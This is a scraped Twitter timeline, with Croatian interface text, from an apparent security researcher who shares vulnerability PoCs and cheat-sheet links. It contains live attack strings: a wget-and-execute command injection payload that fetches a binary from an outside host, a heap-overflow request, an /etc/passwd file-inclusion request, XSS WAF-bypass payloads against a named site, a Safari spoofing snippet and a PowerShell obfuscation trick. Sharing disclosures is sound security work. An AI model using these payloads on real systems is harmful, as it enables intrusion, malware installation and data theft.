Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @wugeej
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @wugeej
-
Prikvačeni tweet
CVE-2020-0674: Internet Explorer Remote Code Execution Vulnerability Exploited in the Wild Zero-day remote code execution vulnerability Triggers 0. JScript 1. used in
#argument 2.#recursion ... Proof of Concept Demo Videopic.twitter.com/K3PRkb753sOvo je potencijalno osjetljiv multimedijski sadržaj. Saznajte višeHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
[PoC] Heap Overflow in F-Secure Internet Gatekeeper POST /submit HTTP/1.1 Host: 192.168.0.24:9012 Content-Length: 21487483844 AAAAAAAAAAAAAAAAAAAAAAAAAAA https://blog.doyensec.com/2020/02/03/heap-exploit.html?fbclid=IwAR3bVbf9gDTsDtJAhe7g3m_LHMi2TOFV6AtIoKoHUonKWqpq8qqmgLzgxPU …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Hackers have already compromised more than 2,300 systems. GET /card_scan_decoder.php?No=30&door=`w get hxxp://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1", [PoC] CVE-2019-7256 https://packetstormsecurity.com/files/cve/CVE-2019-7256 … [In the Wild Packets]https://pastebin.com/ac5JYcJr
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Turkey Turk Hack Team Presents DDoS Attack on Chinese Network VPS / VDS https://www.turkhackteam.org/forum-hakkinda/1887292-turkiye-ye-yapilan-saldirilara-misilleme-toplu-ddos-etkinligi.html …pic.twitter.com/BPRn3cXduM
Ovo je potencijalno osjetljiv multimedijski sadržaj. Saznajte više
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
WordPress sites potentially exposed to hack due to Code Snippets flaw High Severity CSRF to RCE Vulnerability Patched in Code Snippets Plugin [Demo Video]https://www.youtube.com/watch?v=tuGog329Ayg&feature=youtu.be …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
[PoC] Juniper Junos Space Local File Inclusion (CVE-2020-1611) - GET Param: (1) Set "Format" to "txt" (2) Set "FileUrl" to a local path - /ect/passwd GET /mainui/download?X-CSRF=Y581SFvK....53107455361&FileUrl=/etc/passwd&Format=txt&nod... HTTP/1.1https://github.com/Ibonok/CVE-2020-1611 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
[PoC] Safari Address Bar Spoof (CVE-2020-3833) var x = window .open('',''); setInterval(function(){x.location.replace('hxxps://www.google.com:8080');}); x. document. write(atob(evilPage)); https://github.com/c0d3G33k/Safari-Address-Bar-Spoof-CVE-2020-3833- …pic.twitter.com/nMwy2V8asx
Ovo je potencijalno osjetljiv multimedijski sadržaj. Saznajte višeHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Web Application Penetration Testing Cheat Sheet Cross-site Request Forgery SQL injection Cross-site Scripting Offline Password Cracking Remote File Inclusion Local File Inclusion Open Redirection OS Command Injection XML External Entities Vul Scanninghttps://web.archive.org/web/20190507102921/https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/#testing-session-tokens-with-burp …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Windows Red Team Cheat Sheet 1. Recon 2. Elevation of Privileges 3. Lateral Movement 4. Golden and Silver Tickets 5. AD Attacks 6. Bypass-Evasion Techniques 7. Miscellaneous 8. Post exploitation - information gathering 9. Summary of tools https://morph3sec.com/2019/07/16/Windows-Red-Team-Cheat-Sheet/ …pic.twitter.com/oDXKA2bN4b
Ovo je potencijalno osjetljiv multimedijski sadržaj. Saznajte više
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
WAF bypass %80 with any hex value beyond %7f Filtered: hxxps://www.starbucks.com.br/testing%2522%2520accesskey='x'%2520onclick='confirm%601%60' Bypassed: hxxps://www.starbucks.com.br/testing%2522%80%2520accesskey='x'%2520onclick='confirm%601%60'https://hackerone.com/reports/716761
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
[PoC] WAF bypass via double encoded non standard ASCII chars permitted a reflected XSS on response page not found pages - (629745 bypass) hxxps://www.starbucks.com.br/testing%2522%80%2520accesskey='x'%2520onclick='confirm%601%60'https://hackerone.com/reports/716761
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
[PoC] Account take over of 'light' starbuckscardb2b users 'light' accounts on https://www.starbuckscardb2b.com could be taken over by registering a new account with the same email address https://hackerone.com/reports/767829 pic.twitter.com/d2hXfh9FZu
Ovo je potencijalno osjetljiv multimedijski sadržaj. Saznajte više
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Multiple Vul in (*.blog.yelp.com) - Leakage user admin Sensitive Exposure *. https://blog.yelp.com/wp-json/ - user-admin sensitive exposure *. https://blog.yelp.com/wp-login.php - Admin-Page disclousure Add Param Origin in Req Header Origin http://127.0.0.1:8080 https://hackerone.com/reports/779656 pic.twitter.com/obIRivS3NZ
Ovo je potencijalno osjetljiv multimedijski sadržaj. Saznajte više
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Cameradar – Hack RTSP Video Surveillance CCTV Cameras - The main features Detect open RTSP hosts Detect which device model is streaming Launch automated dictionary attacks to get their stream route and username/password of the cameras https://github.com/Ullaakut/cameradar …pic.twitter.com/70xFUc8DfT
Ovo je potencijalno osjetljiv multimedijski sadržaj. Saznajte višeHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
#RSAC#SanFrancisco 2020#BirdsOfAFeather Share the Infosec about Recent “Chinese/N.Korea Hacking Groups” Attacks 9:20AM#MosconeWest#AbusingtheSIM https://www.rsaconference.com/experts/jin-wook-kim …pic.twitter.com/4Yda2yo9wfOvo je potencijalno osjetljiv multimedijski sadržaj. Saznajte višeHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
#RSAC#SanFrancisco 2020 Emerging Threats(Hackers & Threats) Ransomware Spread Through Various Distribution Methods from 2018 to 2019 | 9:35 AM – 10:05 AM#Moscone West Gonna Share the incident case https://www.rsaconference.com/usa/agenda/emerging-threats …pic.twitter.com/y1IKebWNSfOvo je potencijalno osjetljiv multimedijski sadržaj. Saznajte više
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Penetration testing ultimate collection of Cheat sheets
#SANS#coreb1t#OWASP#TOP100#WEBAPP#Unixstuff#UNIXTOOLBOX#Passwordcracking#Misctoolscheatsheethttps://medium.com/@yiukingyau/penetration-testing-ultimate-collection-of-cheat-sheets-98d827572a4f …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Stealing sensitive info by abusing Google Chrome cache Credentials Username: gamer Password: gamer When Access Control Allow Origin header is set to * without having cache control response headers , an attacker can steal victim's private informationhttps://github.com/MayurUdiniya/Chrome-CORS …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
[BUG BOUNTY WRITE-UPS] Cross-Site Websocket Hijacking bug in Facebook that leads to account takeover hijack the Websocket connection of a Facebook user who is using the new Facebook platform (name REDECATED) https://ysamm.com/?p=363 pic.twitter.com/e0HEzsvxM8
Ovo je potencijalno osjetljiv multimedijski sadržaj. Saznajte više
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
PowerShell Obfuscation using SecureString PS> $encoded = ConvertFrom-SecureString -k (0..15) (ConvertTo-SecureString "Malicious Command" -AsPlainText -Force) PS> $encoded 76492d1116743f0423413b16050a5345MgB8AFIAWQB3AHoAbABjADMA3.....QBjADQAOQA4ADkA https://www.wietzebeukema.nl/blog/powershell-obfuscation-using-securestring …pic.twitter.com/hbMV8hStVf
Ovo je potencijalno osjetljiv multimedijski sadržaj. Saznajte više
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.